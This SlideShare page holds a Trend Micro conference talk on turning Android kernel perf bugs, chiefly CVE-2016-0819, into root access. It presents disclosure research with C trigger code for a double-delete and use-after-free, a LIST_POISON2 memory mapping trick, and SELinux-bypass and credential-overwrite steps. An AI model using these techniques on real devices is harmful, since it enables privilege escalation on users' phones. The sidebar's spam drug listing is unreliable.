SlideShare a Scribd company logo

From Profiling to Kernel Exploiting

Download as PPT, PDF
Trend Micro
Trend Micro

Trend Micro's Mobile Threat Response Team presents Perf: From Profiling to Kernel Exploiting.

Technology
1 of 21
Perf: From Profiling to Kernel Exploiting @Wish_Wu Mobile Threat Response Team
0 The Perf Performance counters: = hardware features (CPU/PMU, Performance Monitoring Unit) + software features (software counters, tracepoints). Running cmd“man perf_event_open”will show 1233 lines of descriptions. Userspace command perf Userspace tool source code tool/perf Related syscall perf_event_open ioctl mmap prctl close Kernel Source Code kernel/events/* arch/<arch>/kernel/*
0 The Perf in Android • Syscall perf_event_open is enabled on most of the latest smart phones. • There is no strong relationship between the Android version and the customized Android Linux version. Vendors can also customize their linux kernel and SElinux policy. Most Android versions from 4.4.4 to 6.0.1 have enabled this syscall. • An application which has no permission required can invoke this syscall. • Many CPU vendors would like to add their PMU to Linux for specific performance testing. These codes will not be merged into the mainline of Linux. So these codes may not be totally reviewed.
0 The Perf in Android Kernel Perf Subsystem Architecture Specific Vendor Specific Bug
0 The Perf in Android How to detect bugs 1. perf_fuzzer (Vincent M. Weaver and Dave Jones) http://web.eece.maine.edu/~vweaver/projects/perf_events/fuzzer/2015_perf_fuz https://github.com/deater/perf_event_tests 2. Trinity https://github.com/kernelslacker/trinity 3. Code Review 4. Tools written by myself
0 http://source.android.com/security/bulletin/2016-02-01.html http://source.android.com/security/bulletin/2016-03-01.html http://source.android.com/security/bulletin/2016-04-02.html The Perf in Android CVE Bug Severity Updated versions Date reported CVE-2016-0805 ANDROID-25773204* Critical 4.4.4, 5.0, 5.1.1, 6.0, 6.0.1 Nov 15, 2015 CVE-2016-0819 ANDROID-25364034* Critical 4.4.4, 5.0, 5.1.1, 6.0, 6.0.1 Oct 29, 2015 CVE-2016-0843 ANDROID-25801197* Critical 4.4.4, 5.0, 5.1.1, 6.0, 6.0.1 Nov 19, 2015 Bug Severity issue AndroidID-26112842 Low https://code.google.com/p/android/issues/detail?id=196588 AndroidID-28086229 Critical https://code.google.com/p/android/issues/detail?id=206153 Published Bugs Unpublished Bugs
1 The Bug CVE-2016-0819 Possibly effected – and not limited to: Samsung GALAXY Note Edge Sony Xperia Z5 Samsung GALAXY Note 4 Sony Xperia Z4 Samsung GALAXY A9 Sony Xperia Z3 Samsung GALAXY A8 Sony Xperia E3 Samsung GALAXY A7 LG G5 Samsung GALAXY A5 LG G4 Samsung GALAXY On7 LG G4c Samsung GALAXY J7 LG Nexus 5X Samsung GALAXY J5 Motorola Nexus 6 Samsung GALAXY J3 Huawei Nexus 6P
1 The Bug file: kernel/events/core.c 3105 static int perf_release(struct inode *inode, struct file *file) 3106 { 3107 struct perf_event *event = file->private_data; 3108 3109 /* 3110 * Event can be in state OFF because of a constraint check. 3111 * Change to ACTIVE so that it gets cleaned up correctly. 3112 */ 3113 if ((event->state == PERF_EVENT_STATE_OFF) && 3114 event->attr.constraint_duplicate) 3115 event->state = PERF_EVENT_STATE_ACTIVE; 3116 3117 put_event(file->private_data); 3118 return 0; 3119 }
1 The Bug file: kernel/events/core.c 1199 if (event->state != PERF_EVENT_STATE_ACTIVE) 1200 return; 1201 1202 event->state = PERF_EVENT_STATE_INACTIVE; 1203 if (event->pending_disable) { 1204 event->pending_disable = 0; 1205 event->state = PERF_EVENT_STATE_OFF; 1206 } 1207 event->tstamp_stopped = tstamp; 1208 event->pmu->del(event, 0); 1209 event->oncpu = -1;
1 The Bug Test Case Code: struct perf_event_attr attr; memset(&attr, 0, sizeof(attr)); attr.type = PERF_TYPE_TRACEPOINT; attr.size = sizeof(attr); attr.config = value //read from /sys/kernel/debug/tracing/events/* __u64 *ptr = &attr.config; ptr++; *ptr |= 1 << 23; //set constraint_duplicate to 1 int fd = perf_event_open(&attr, 0, -1,-1, 0); //use ioctl() to delete perf_event from list first time ioctl(fd, PERF_EVENT_IOC_DISABLE, 0); //use close() to delete perf_event from list second time, and free it close(fd);
1 The Bug 1. The bug can double delete a hlist node. 2. For list in kernel, delete != free . 3. A deleted node can be added to hlist again. 4. Nodes can only be added into hlist head, but can be deleted from anywhere.
2 Double delete //A hlist node is defined as below: struct hlist_node { struct hlist_node *next; struct hlist_node **pprev; }; //A hlist head is defined as below: struct hlist_head { struct hlist_node *first; }; next Node pprev next Node pprev next Node pprev first Head
2 Double delete LIST_POISON2 == 0x00200200 in 32-bit Android. mmap((void *)0x200200, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_POPULATE, -1, 0); mlock((void *)0x200200, 0x1000); GOOGLE: LIST_POISON2 to 0x00000200
2 Double delete next 0x200200 pprev next Node10 pprev next Node20 pprev next Node30 pprev next Node40 pprev ioctl Node20 close Node20 close Node30 Leak Node30's address to userspace!!!! Node10’s next pointer points to free space Use After Free!!!!!!
2 Double delete Simple ?? NO!!!!!
2 Double delete
3 Ret2dir Tech Vasileios P. Kemerlis. Michalis Polychronakis. Angelos D. Keromytis http://www.cs.columbia.edu/~vpk/papers/ret2dir.sec14.pdf
3 Ret2dir Tech This node will be reused. I put data here.
4 Get Root GeekBen's TowelRoot Source Code: https://github.com/geekben/towelroot/blob/master/towelroot.c 1.addr_limit = 0xffffffff 2.selinux_enforcing = 0 to bypass SELinux 3. modify struct cred and selinux security object.
4 Get Root Demo
Thank You

Recommended

IBM Cognos 10 Under the Hood
IBM Cognos 10 Under the HoodIBM Cognos 10 Under the Hood
IBM Cognos 10 Under the Hood
Senturus
 
Industrial Remote Controllers Safety, Security, Vulnerabilities
Industrial Remote Controllers Safety, Security, VulnerabilitiesIndustrial Remote Controllers Safety, Security, Vulnerabilities
Industrial Remote Controllers Safety, Security, Vulnerabilities
Trend Micro
 
Investigating Web Defacement Campaigns at Large
Investigating Web Defacement Campaigns at LargeInvestigating Web Defacement Campaigns at Large
Investigating Web Defacement Campaigns at Large
Trend Micro
 
Behind the scene of malware operators. Insights and countermeasures. CONFiden...
Behind the scene of malware operators. Insights and countermeasures. CONFiden...Behind the scene of malware operators. Insights and countermeasures. CONFiden...
Behind the scene of malware operators. Insights and countermeasures. CONFiden...
Trend Micro
 
Automated Security for the Real-time Enterprise with VMware NSX and Trend Mic...
Automated Security for the Real-time Enterprise with VMware NSX and Trend Mic...Automated Security for the Real-time Enterprise with VMware NSX and Trend Mic...
Automated Security for the Real-time Enterprise with VMware NSX and Trend Mic...
Trend Micro
 
Skip the Security Slow Lane with VMware Cloud on AWS
Skip the Security Slow Lane with VMware Cloud on AWSSkip the Security Slow Lane with VMware Cloud on AWS
Skip the Security Slow Lane with VMware Cloud on AWS
Trend Micro
 
Dark Web Impact on Hidden Services in the Tor-based Criminal Ecosystem Dr.
Dark Web Impact on Hidden Services in the Tor-based Criminal Ecosystem Dr.Dark Web Impact on Hidden Services in the Tor-based Criminal Ecosystem Dr.
Dark Web Impact on Hidden Services in the Tor-based Criminal Ecosystem Dr.
Trend Micro
 
Mobile Telephony Threats in Asia
Mobile Telephony Threats in AsiaMobile Telephony Threats in Asia
Mobile Telephony Threats in Asia
Trend Micro
 

Recommended

IBM Cognos 10 Under the Hood
IBM Cognos 10 Under the HoodIBM Cognos 10 Under the Hood
IBM Cognos 10 Under the Hood
Senturus
 
Industrial Remote Controllers Safety, Security, Vulnerabilities
Industrial Remote Controllers Safety, Security, VulnerabilitiesIndustrial Remote Controllers Safety, Security, Vulnerabilities
Industrial Remote Controllers Safety, Security, Vulnerabilities
Trend Micro
 
Investigating Web Defacement Campaigns at Large
Investigating Web Defacement Campaigns at LargeInvestigating Web Defacement Campaigns at Large
Investigating Web Defacement Campaigns at Large
Trend Micro
 
Behind the scene of malware operators. Insights and countermeasures. CONFiden...
Behind the scene of malware operators. Insights and countermeasures. CONFiden...Behind the scene of malware operators. Insights and countermeasures. CONFiden...
Behind the scene of malware operators. Insights and countermeasures. CONFiden...
Trend Micro
 
Automated Security for the Real-time Enterprise with VMware NSX and Trend Mic...
Automated Security for the Real-time Enterprise with VMware NSX and Trend Mic...Automated Security for the Real-time Enterprise with VMware NSX and Trend Mic...
Automated Security for the Real-time Enterprise with VMware NSX and Trend Mic...
Trend Micro
 
Skip the Security Slow Lane with VMware Cloud on AWS
Skip the Security Slow Lane with VMware Cloud on AWSSkip the Security Slow Lane with VMware Cloud on AWS
Skip the Security Slow Lane with VMware Cloud on AWS
Trend Micro
 
Dark Web Impact on Hidden Services in the Tor-based Criminal Ecosystem Dr.
Dark Web Impact on Hidden Services in the Tor-based Criminal Ecosystem Dr.Dark Web Impact on Hidden Services in the Tor-based Criminal Ecosystem Dr.
Dark Web Impact on Hidden Services in the Tor-based Criminal Ecosystem Dr.
Trend Micro
 
Mobile Telephony Threats in Asia
Mobile Telephony Threats in AsiaMobile Telephony Threats in Asia
Mobile Telephony Threats in Asia
Trend Micro
 
Cybercrime In The Deep Web
Cybercrime In The Deep WebCybercrime In The Deep Web
Cybercrime In The Deep Web
Trend Micro
 
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)
Trend Micro
 
HBR APT framework
HBR APT frameworkHBR APT framework
HBR APT framework
Trend Micro
 
Captain, Where Is Your Ship – Compromising Vessel Tracking Systems
Captain, Where Is Your Ship – Compromising Vessel Tracking SystemsCaptain, Where Is Your Ship – Compromising Vessel Tracking Systems
Captain, Where Is Your Ship – Compromising Vessel Tracking Systems
Trend Micro
 
Countering the Advanced Persistent Threat Challenge with Deep Discovery
Countering the Advanced Persistent Threat Challenge with Deep DiscoveryCountering the Advanced Persistent Threat Challenge with Deep Discovery
Countering the Advanced Persistent Threat Challenge with Deep Discovery
Trend Micro
 
The Custom Defense Against Targeted Attacks
The Custom Defense Against Targeted AttacksThe Custom Defense Against Targeted Attacks
The Custom Defense Against Targeted Attacks
Trend Micro
 
Where to Store the Cloud Encryption Keys - InterOp 2012
Where to Store the Cloud Encryption Keys - InterOp 2012Where to Store the Cloud Encryption Keys - InterOp 2012
Where to Store the Cloud Encryption Keys - InterOp 2012
Trend Micro
 
[Case Study ~ 2011] Baptist Hospitals of Southest Texas
[Case Study ~ 2011] Baptist Hospitals of Southest Texas[Case Study ~ 2011] Baptist Hospitals of Southest Texas
[Case Study ~ 2011] Baptist Hospitals of Southest Texas
Trend Micro
 
Who owns security in the cloud
Who owns security in the cloudWho owns security in the cloud
Who owns security in the cloud
Trend Micro
 
Encryption in the Public Cloud: 16 Bits of Advice for Security Techniques
Encryption in the Public Cloud: 16 Bits of Advice for Security TechniquesEncryption in the Public Cloud: 16 Bits of Advice for Security Techniques
Encryption in the Public Cloud: 16 Bits of Advice for Security Techniques
Trend Micro
 
Threat predictions 2011
Threat predictions 2011 Threat predictions 2011
Threat predictions 2011
Trend Micro
 
Trend micro deep security
Trend micro deep securityTrend micro deep security
Trend micro deep security
Trend Micro
 
Assuring regulatory compliance, ePHI protection, and secure healthcare delivery
Assuring regulatory compliance, ePHI protection, and secure healthcare deliveryAssuring regulatory compliance, ePHI protection, and secure healthcare delivery
Assuring regulatory compliance, ePHI protection, and secure healthcare delivery
Trend Micro
 
Solutions for privacy, disclosure and encryption
Solutions for privacy, disclosure and encryptionSolutions for privacy, disclosure and encryption
Solutions for privacy, disclosure and encryption
Trend Micro
 
Security Best Practices for Health Information Exchange
Security Best Practices for Health Information ExchangeSecurity Best Practices for Health Information Exchange
Security Best Practices for Health Information Exchange
Trend Micro
 
Solutions for PCI DSS Compliance
Solutions for PCI DSS ComplianceSolutions for PCI DSS Compliance
Solutions for PCI DSS Compliance
Trend Micro
 
PC Maker's Support Page Succumbs To Compromise
PC Maker's Support Page Succumbs To CompromisePC Maker's Support Page Succumbs To Compromise
PC Maker's Support Page Succumbs To Compromise
Trend Micro
 
Web Threat Spotlight Issue 66: Zero-Day Adobe Flash Player Exploits in a Flash
Web Threat Spotlight Issue 66: Zero-Day Adobe Flash Player Exploits in a FlashWeb Threat Spotlight Issue 66: Zero-Day Adobe Flash Player Exploits in a Flash
Web Threat Spotlight Issue 66: Zero-Day Adobe Flash Player Exploits in a Flash
Trend Micro
 
FIFA Spam Targets Football Fanatics
FIFA Spam Targets Football FanaticsFIFA Spam Targets Football Fanatics
FIFA Spam Targets Football Fanatics
Trend Micro
 
The Heart of KOOBFACE
The Heart of KOOBFACEThe Heart of KOOBFACE
The Heart of KOOBFACE
Trend Micro
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
Overkill Security
 

More Related Content

More from Trend Micro

Cybercrime In The Deep Web
Cybercrime In The Deep WebCybercrime In The Deep Web
Cybercrime In The Deep Web
Trend Micro
 
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)
Trend Micro
 
Captain, Where Is Your Ship – Compromising Vessel Tracking Systems
Captain, Where Is Your Ship – Compromising Vessel Tracking SystemsCaptain, Where Is Your Ship – Compromising Vessel Tracking Systems
Captain, Where Is Your Ship – Compromising Vessel Tracking Systems
Trend Micro
 
Who owns security in the cloud
Who owns security in the cloudWho owns security in the cloud
Who owns security in the cloud
Trend Micro
 
Assuring regulatory compliance, ePHI protection, and secure healthcare delivery
Assuring regulatory compliance, ePHI protection, and secure healthcare deliveryAssuring regulatory compliance, ePHI protection, and secure healthcare delivery
Assuring regulatory compliance, ePHI protection, and secure healthcare delivery
Trend Micro
 
Solutions for privacy, disclosure and encryption
Solutions for privacy, disclosure and encryptionSolutions for privacy, disclosure and encryption
Solutions for privacy, disclosure and encryption
Trend Micro
 
Security Best Practices for Health Information Exchange
Security Best Practices for Health Information ExchangeSecurity Best Practices for Health Information Exchange
Security Best Practices for Health Information Exchange
Trend Micro
 
Solutions for PCI DSS Compliance
Solutions for PCI DSS ComplianceSolutions for PCI DSS Compliance
Solutions for PCI DSS Compliance
Trend Micro
 

More from Trend Micro (20)

Cybercrime In The Deep Web
Cybercrime In The Deep WebCybercrime In The Deep Web
Cybercrime In The Deep Web
 
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)
 
HBR APT framework
HBR APT frameworkHBR APT framework
HBR APT framework
 
Captain, Where Is Your Ship – Compromising Vessel Tracking Systems
Captain, Where Is Your Ship – Compromising Vessel Tracking SystemsCaptain, Where Is Your Ship – Compromising Vessel Tracking Systems
Captain, Where Is Your Ship – Compromising Vessel Tracking Systems
 
Countering the Advanced Persistent Threat Challenge with Deep Discovery
Countering the Advanced Persistent Threat Challenge with Deep DiscoveryCountering the Advanced Persistent Threat Challenge with Deep Discovery
Countering the Advanced Persistent Threat Challenge with Deep Discovery
 
The Custom Defense Against Targeted Attacks
The Custom Defense Against Targeted AttacksThe Custom Defense Against Targeted Attacks
The Custom Defense Against Targeted Attacks
 
Where to Store the Cloud Encryption Keys - InterOp 2012
Where to Store the Cloud Encryption Keys - InterOp 2012Where to Store the Cloud Encryption Keys - InterOp 2012
Where to Store the Cloud Encryption Keys - InterOp 2012
 
[Case Study ~ 2011] Baptist Hospitals of Southest Texas
[Case Study ~ 2011] Baptist Hospitals of Southest Texas[Case Study ~ 2011] Baptist Hospitals of Southest Texas
[Case Study ~ 2011] Baptist Hospitals of Southest Texas
 
Who owns security in the cloud
Who owns security in the cloudWho owns security in the cloud
Who owns security in the cloud
 
Encryption in the Public Cloud: 16 Bits of Advice for Security Techniques
Encryption in the Public Cloud: 16 Bits of Advice for Security TechniquesEncryption in the Public Cloud: 16 Bits of Advice for Security Techniques
Encryption in the Public Cloud: 16 Bits of Advice for Security Techniques
 
Threat predictions 2011
Threat predictions 2011 Threat predictions 2011
Threat predictions 2011
 
Trend micro deep security
Trend micro deep securityTrend micro deep security
Trend micro deep security
 
Assuring regulatory compliance, ePHI protection, and secure healthcare delivery
Assuring regulatory compliance, ePHI protection, and secure healthcare deliveryAssuring regulatory compliance, ePHI protection, and secure healthcare delivery
Assuring regulatory compliance, ePHI protection, and secure healthcare delivery
 
Solutions for privacy, disclosure and encryption
Solutions for privacy, disclosure and encryptionSolutions for privacy, disclosure and encryption
Solutions for privacy, disclosure and encryption
 
Security Best Practices for Health Information Exchange
Security Best Practices for Health Information ExchangeSecurity Best Practices for Health Information Exchange
Security Best Practices for Health Information Exchange
 
Solutions for PCI DSS Compliance
Solutions for PCI DSS ComplianceSolutions for PCI DSS Compliance
Solutions for PCI DSS Compliance
 
PC Maker's Support Page Succumbs To Compromise
PC Maker's Support Page Succumbs To CompromisePC Maker's Support Page Succumbs To Compromise
PC Maker's Support Page Succumbs To Compromise
 
Web Threat Spotlight Issue 66: Zero-Day Adobe Flash Player Exploits in a Flash
Web Threat Spotlight Issue 66: Zero-Day Adobe Flash Player Exploits in a FlashWeb Threat Spotlight Issue 66: Zero-Day Adobe Flash Player Exploits in a Flash
Web Threat Spotlight Issue 66: Zero-Day Adobe Flash Player Exploits in a Flash
 
FIFA Spam Targets Football Fanatics
FIFA Spam Targets Football FanaticsFIFA Spam Targets Football Fanatics
FIFA Spam Targets Football Fanatics
 
The Heart of KOOBFACE
The Heart of KOOBFACEThe Heart of KOOBFACE
The Heart of KOOBFACE
 

Recently uploaded

DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
Overkill Security
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
Overkill Security
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Recently uploaded (20)

DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 

From Profiling to Kernel Exploiting

  • 1. Perf: From Profiling to Kernel Exploiting @Wish_Wu Mobile Threat Response Team
  • 2. 0 The Perf Performance counters: = hardware features (CPU/PMU, Performance Monitoring Unit) + software features (software counters, tracepoints). Running cmd“man perf_event_open”will show 1233 lines of descriptions. Userspace command perf Userspace tool source code tool/perf Related syscall perf_event_open ioctl mmap prctl close Kernel Source Code kernel/events/* arch/<arch>/kernel/*
  • 3. 0 The Perf in Android • Syscall perf_event_open is enabled on most of the latest smart phones. • There is no strong relationship between the Android version and the customized Android Linux version. Vendors can also customize their linux kernel and SElinux policy. Most Android versions from 4.4.4 to 6.0.1 have enabled this syscall. • An application which has no permission required can invoke this syscall. • Many CPU vendors would like to add their PMU to Linux for specific performance testing. These codes will not be merged into the mainline of Linux. So these codes may not be totally reviewed.
  • 4. 0 The Perf in Android Kernel Perf Subsystem Architecture Specific Vendor Specific Bug
  • 5. 0 The Perf in Android How to detect bugs 1. perf_fuzzer (Vincent M. Weaver and Dave Jones) http://web.eece.maine.edu/~vweaver/projects/perf_events/fuzzer/2015_perf_fuz https://github.com/deater/perf_event_tests 2. Trinity https://github.com/kernelslacker/trinity 3. Code Review 4. Tools written by myself
  • 6. 0 http://source.android.com/security/bulletin/2016-02-01.html http://source.android.com/security/bulletin/2016-03-01.html http://source.android.com/security/bulletin/2016-04-02.html The Perf in Android CVE Bug Severity Updated versions Date reported CVE-2016-0805 ANDROID-25773204* Critical 4.4.4, 5.0, 5.1.1, 6.0, 6.0.1 Nov 15, 2015 CVE-2016-0819 ANDROID-25364034* Critical 4.4.4, 5.0, 5.1.1, 6.0, 6.0.1 Oct 29, 2015 CVE-2016-0843 ANDROID-25801197* Critical 4.4.4, 5.0, 5.1.1, 6.0, 6.0.1 Nov 19, 2015 Bug Severity issue AndroidID-26112842 Low https://code.google.com/p/android/issues/detail?id=196588 AndroidID-28086229 Critical https://code.google.com/p/android/issues/detail?id=206153 Published Bugs Unpublished Bugs
  • 7. 1 The Bug CVE-2016-0819 Possibly effected – and not limited to: Samsung GALAXY Note Edge Sony Xperia Z5 Samsung GALAXY Note 4 Sony Xperia Z4 Samsung GALAXY A9 Sony Xperia Z3 Samsung GALAXY A8 Sony Xperia E3 Samsung GALAXY A7 LG G5 Samsung GALAXY A5 LG G4 Samsung GALAXY On7 LG G4c Samsung GALAXY J7 LG Nexus 5X Samsung GALAXY J5 Motorola Nexus 6 Samsung GALAXY J3 Huawei Nexus 6P
  • 8. 1 The Bug file: kernel/events/core.c 3105 static int perf_release(struct inode *inode, struct file *file) 3106 { 3107 struct perf_event *event = file->private_data; 3108 3109 /* 3110 * Event can be in state OFF because of a constraint check. 3111 * Change to ACTIVE so that it gets cleaned up correctly. 3112 */ 3113 if ((event->state == PERF_EVENT_STATE_OFF) && 3114 event->attr.constraint_duplicate) 3115 event->state = PERF_EVENT_STATE_ACTIVE; 3116 3117 put_event(file->private_data); 3118 return 0; 3119 }
  • 9. 1 The Bug file: kernel/events/core.c 1199 if (event->state != PERF_EVENT_STATE_ACTIVE) 1200 return; 1201 1202 event->state = PERF_EVENT_STATE_INACTIVE; 1203 if (event->pending_disable) { 1204 event->pending_disable = 0; 1205 event->state = PERF_EVENT_STATE_OFF; 1206 } 1207 event->tstamp_stopped = tstamp; 1208 event->pmu->del(event, 0); 1209 event->oncpu = -1;
  • 10. 1 The Bug Test Case Code: struct perf_event_attr attr; memset(&attr, 0, sizeof(attr)); attr.type = PERF_TYPE_TRACEPOINT; attr.size = sizeof(attr); attr.config = value //read from /sys/kernel/debug/tracing/events/* __u64 *ptr = &attr.config; ptr++; *ptr |= 1 << 23; //set constraint_duplicate to 1 int fd = perf_event_open(&attr, 0, -1,-1, 0); //use ioctl() to delete perf_event from list first time ioctl(fd, PERF_EVENT_IOC_DISABLE, 0); //use close() to delete perf_event from list second time, and free it close(fd);
  • 11. 1 The Bug 1. The bug can double delete a hlist node. 2. For list in kernel, delete != free . 3. A deleted node can be added to hlist again. 4. Nodes can only be added into hlist head, but can be deleted from anywhere.
  • 12. 2 Double delete //A hlist node is defined as below: struct hlist_node { struct hlist_node *next; struct hlist_node **pprev; }; //A hlist head is defined as below: struct hlist_head { struct hlist_node *first; }; next Node pprev next Node pprev next Node pprev first Head
  • 13. 2 Double delete LIST_POISON2 == 0x00200200 in 32-bit Android. mmap((void *)0x200200, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_POPULATE, -1, 0); mlock((void *)0x200200, 0x1000); GOOGLE: LIST_POISON2 to 0x00000200
  • 14. 2 Double delete next 0x200200 pprev next Node10 pprev next Node20 pprev next Node30 pprev next Node40 pprev ioctl Node20 close Node20 close Node30 Leak Node30's address to userspace!!!! Node10’s next pointer points to free space Use After Free!!!!!!
  • 17. 3 Ret2dir Tech Vasileios P. Kemerlis. Michalis Polychronakis. Angelos D. Keromytis http://www.cs.columbia.edu/~vpk/papers/ret2dir.sec14.pdf
  • 18. 3 Ret2dir Tech This node will be reused. I put data here.
  • 19. 4 Get Root GeekBen's TowelRoot Source Code: https://github.com/geekben/towelroot/blob/master/towelroot.c 1.addr_limit = 0xffffffff 2.selinux_enforcing = 0 to bypass SELinux 3. modify struct cred and selinux security object.

Editor's Notes

